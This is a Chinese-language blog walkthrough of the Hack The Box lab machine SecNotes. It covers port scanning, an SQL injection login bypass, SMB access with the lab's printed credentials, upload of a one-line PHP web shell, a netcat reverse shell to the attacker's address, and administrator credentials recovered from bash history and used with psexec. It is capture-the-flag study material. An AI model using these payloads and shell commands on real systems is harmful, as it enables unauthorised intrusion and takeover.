hackthebox-secnotes （IIS-php ）

最新推荐文章于 2024-05-13 10:24:58 发布

冬萍子

最新推荐文章于 2024-05-13 10:24:58 发布

阅读量322

点赞数

本文链接：https://blog.csdn.net/weixin_45527786/article/details/113793441

版权

1、扫描

445开了说明可能有smb登录，8808有http

C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.97                                    
Discovered open port 8808/tcp on 10.10.10.97                                   
Discovered open port 80/tcp on 10.10.10.97                                     
^Zte:  0.00-kpps, 100.00% done, waiting -22-secs, found=3         
[1]+  Stopped                 masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.97 -p445,8808,80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-12 09:48 CST
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.35s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m09s, median: -1s
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2021-02-11T17:48:43-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-12T01:48:45
|_  start_date: N/A

2、注入 & smb渗透

8808
注册，进入。但是中规中矩没啥用
注册时用注入 test' or 1=1-- -
再登录，就可以看到新东西了，明显的smb登录信息。把这个10.10.10.97 secnotes.htb加到本机/etc/hosts
在这里插入图片描述
进入smbsmbclient //secnotes.htb/new-site -U "tyler"，输入密码92g!mA8BGjOirkL%OG*&

ls查看发现就是网页里iis的默认图片。说明往里面传什么，网页就相应有什么。
那么根据套路一般iis传asp aspx之类，但是都没用，再试试传cmd.php put cmd.php。试whoami成功显示
cmd.php里的内容

<?php echo shell_exec($_GET['cmd']); ?>

在这里插入图片描述
接着传nc put nc.exe进去，弹shell
多次执行都弹不回shell。
最终上传nc64位加用curl才管用

curl "http://10.10.10.97:8808/cmd.php?cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443"

3、提权

在用户桌面发现bash这一linux才用的东西，很奇怪
在这里插入图片描述

全靶机搜bash.exe

where /R C:\ bash.exe

第二个可用
在这里插入图片描述
跟linux操作一样的了，变ttypython -c 'import pty;pty.spawn("/bin/bash")'
查看隐藏文件，发现历史，打开看cat .bash_history

发现admin的账号密码，administrator%u6!4ZwgwOM#^OBf#Nwnh
用impacket包https://github.com/SecureAuthCorp/impacket里的psexec.py直接登录psexec.py administrator@10.10.10.97
拿下。
在这里插入图片描述

冬萍子

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
hackthebox-secnotes （IIS-php ）

1、扫描445开了说明可能有smb登录，8808有httpC:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-ethInitiating SYN
复制链接

扫一扫